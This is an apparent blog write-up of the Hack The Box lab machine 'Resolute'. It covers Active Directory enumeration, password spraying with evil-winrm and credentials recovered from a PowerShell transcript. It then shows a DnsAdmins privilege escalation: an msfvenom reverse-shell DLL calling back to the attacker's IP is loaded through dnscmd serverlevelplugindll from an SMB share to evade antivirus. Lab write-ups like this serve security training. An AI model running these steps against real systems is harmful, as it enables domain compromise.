Hackthebox Resolute writeup
Introduction@Resolute:~$
Column | Details |
---|---|
Name | Resolute |
IP | 10.10.10.169 |
Points | 30 |
Os | Windows |
Difficulty | Medium |
Creator | egre55 |
Out On | 7 Dec May 2019 |
Retired on | 30 May 2020 |
Brief@Resolute:~$
Running enum4linux
agaainst the box we got some usernames and a password for user marko
. After some hit and try we got succed to login as melanie
using evil-winrm . After some manual enumeration i got a hidden
file in a hidden directory . Which contains credentials of the user ryan
. After Switching to ryan we came to know that ryan is in the group of dnsadmin
. Crafting a malicious dll file and adding the entry of our dll
as the serverplugin and restarting the service we will able to execute our dll
as admin.
Summary@Resolute:~$
- Running
enum4linux
gives some usernames . - Got password for a user marko but that turned out of
melanie
. - Logged in as melanie using evil-winrm
- Got
user.txt
- Manual enumeration and got some hidden files
- Got
password
for user ryan from a file. - Switched to ryan
- User is in the group of
dnsadmin
- Crafting malicious dll file for dll-injection
- Starting the smb server using impacket
smbserver.py
- Setting up the path for /serverlevelplugindll to my dll
- Stoping and starting the service
dns
- Got
root.txt
Pwned
Recon
Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
➜ resolute nmap -sC -sV -p- -v -oA scans/nmap-full -T4 resolute.htb
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-29 09:31 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:31
Completed NSE at 09:31, 0.00s elapsed
Initiating NSE at 09:31
Completed NSE at 09:31, 0.00s elapsed
Initiating Ping Scan at 09:31
Scanning resolute.htb (10.10.10.169) [4 ports]
Completed Ping Scan at 09:31, 0.59s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:31
Scanning resolute.htb (10.10.10.169) [65535 ports]
Discovered open port 445/tcp on 10.10.10.169
Discovered open port 139/tcp on 10.10.10.169
Discovered open port 135/tcp on 10.10.10.169
Discovered open port 53/tcp on 10.10.10.169
Discovered open port 49677/tcp on 10.10.10.169
NSE: Script scanning 10.10.10.169.
Initiating NSE at 09:52
Completed NSE at 09:54, 121.80s elapsed
Initiating NSE at 09:54
Completed NSE at 09:54, 1.93s elapsed
Nmap scan report for resolute.htb (10.10.10.169)
Host is up (0.36s latency).
Not shown: 65510 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-29 04:29:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49712/tcp open msrpc Microsoft Windows RPC
64798/tcp open tcpwrapped
64974/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=5/29%Time=5ED11327%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -7h00m31s, deviation: 4h02m32s, median: -9h20m33s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2020-05-28T21:32:12-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-05-29 00:32:10
|_ start_date: 2020-05-28 18:33:16
NSE: Script Post-scanning.
Initiating NSE at 09:54
Completed NSE at 09:54, 0.00s elapsed
Initiating NSE at 09:54
Completed NSE at 09:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1372.93 seconds
Raw packets sent: 72795 (3.203MB) | Rcvd: 69585 (2.784MB)
Woo So many ports and services are opened ……
Enum4linux
Better if i run a enum4linux
for some juicy information
so lets do it….
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
➜ prashant enum4linux resolute.htb
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat May 30 07:44:42 2020
==========================
| Target Information |
==========================
Target ........... resolute.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on resolute.htb |
====================================================
[E] Cant find workgroup/domain
============================================
| Nbtstat Information for resolute.htb |
============================================
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
Looking up status of 10.10.10.169
No reply from 10.10.10.169
As i thought i got everything that can lead to the next steps
Userslist
I got some valid usernames
(Interesting)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]
And one more very interesting thing i got the password of the user marko
1
2
3
4
=============================
| Users on resolute.htb |
=============================
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
So i used evil-winrm using user marko and pass Welcome123!
1
2
3
4
5
6
7
8
9
➜ prashant evil-winrm -u marko -p Welcome123! -i 10.10.10.169
Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
Thats just turned out to be a wrong
password…..
Login as melanie
I could also use metasploit-module
called winrm_login which will just bruteforce the usernames with the password
we have . But to be honest i guessed the username , You can check the below article for further things .
https://www.rapid7.com/db/modules/auxiliary/scanner/winrm/winrm_login
And an error of authorization here it means creds are wrong.Then i just tried with other users with the same password And got success with the user
melanie
1
2
3
4
5
6
7
➜ prashant evil-winrm -u melanie -p Welcome123! -i 10.10.10.169
Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents>
Without wasting any time i grabbed the user flag
Got user.txt
1
2
3
*Evil-WinRM* PS C:\Users\melanie\Desktop> cat user.txt
0c3be45f--------------------8540
*Evil-WinRM* PS C:\Users\melanie\Desktop>
Now its time for root
Enumeration
After some manual
enumeration i got a hidden
dir called PSTranscripts
I just moved to dir \
and performed a dir list for hidden dir too using dir -force
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
*Evil-WinRM* PS C:\> dir -force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 2/8/2020 8:22 PM 402653184 pagefile.sys
*Evil-WinRM* PS C:\>
And got a dir called PSTranscripts
1
2
3
4
5
6
*Evil-WinRM* PS C:\PSTranscripts\20191203> dir -force
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732
PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
And we got a file called PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
*Evil-WinRM* PS C:\PSTranscripts\20191203> cat PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
And the most interesting thing there is a password
of user ryan
- cmd /c net use X: \fs01\backups ryan Serv3r4Admin4cc123!
And the password is Serv3r4Admin4cc123!
Yay…….!!!
Using evil-winrm
i logged in as ryan
1
2
3
4
5
6
7
➜ prashant evil-winrm -i resolute.htb -u ryan -p Serv3r4Admin4cc123!
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents>
Privilege Escalation
For checking what privileges i have i can check it with whoami
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
From the line we can conclude that the user ryan is in dnsadmin
group
1
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
From now i have something o which i can focus
, I got a article after some research
Now i created a malicious dll
file using msfvenom which will give me a meterpreter shell
1
2
3
4
5
6
➜ prashant msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=5678 -f dll > saini.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 5120 bytes
And now i moved the saini.dll
to the machine using iwr
1
*Evil-WinRM* PS C:\tmp> iwr -uri http://10.10.14.4/saini.dll -o saini.dll
And its bees downloaded
1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\tmp> ls
Directory: C:\tmp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/29/2020 10:48 PM 5120 saini.dll
But doing ls
another time the dll file is gone . So i can confirm
that Anti - Virus is running or Real - time Protection .
1
2
*Evil-WinRM* PS C:\tmp> ls
*Evil-WinRM* PS C:\tmp>
I will be using smb service to get rid of
AV
that is also mentioned in the article
So i used impacket
smbserver.py for a quick setup of my smb service
And started smbserver to bypass the av protection on the machine
1
2
3
4
5
6
7
8
9
➜ prashant python /usr/share/doc/python-impacket/examples/smbserver.py -smb2support public .
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Hack - Steps
What i am going to do is setting the serverlevelplugindll
to my malicious dll .
1
dnscmd /config /serverlevelplugindll \\10.10.14.4\public\saini.dll
And Then i need to stop
the service dns and then start
it again so that when the service
start again the dns service will look for the serverplugin and since we have set that plugin
to my dll file , So it will execute my file and we will get a shell for sure.
Setting the serverlevelplugindll to my file
1
2
3
4
5
6
*Evil-WinRM* PS C:\tmp> dnscmd /config /serverlevelplugindll \\10.10.14.4\public\saini.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
*Evil-WinRM* PS C:\tmp>
Stopping the service
1
2
3
4
5
6
7
8
9
10
11
*Evil-WinRM* PS C:\tmp> sc.exe stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
*Evil-WinRM* PS C:\tmp>
Starting the service
1
2
3
4
5
6
7
8
9
10
11
12
13
*Evil-WinRM* PS C:\tmp> sc.exe start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 3948
FLAGS :
*Evil-WinRM* PS C:\tmp>
Got a
meterpreter
shell
1
2
3
4
5
6
7
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.4:5678
[*] Sending stage (206403 bytes) to 10.10.10.169
[*] Meterpreter session 3 opened (10.10.14.4:5678 -> 10.10.10.169:60148) at 2020-05-30 11:20:31 -0400
meterpreter >
Got shell as administrator
Better if we just spawn a shell
1
2
3
4
5
6
7
8
9
meterpreter > shell
Process 1908 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Got root.txt
1
2
3
C:\Users\Administrator\Desktop>type root.txt
type root.txt
e1d---------------------------19c
And we pwned it …….
If u liked the writeup.Support a Poor Student to Get the OSCP-Cert
Donation for OSCP
If you want to get notified as soon as i upload something new to my
blog
So just click on the bell icon you are seeing on the right side – > and allow pushnotification
Comments powered by Disqus.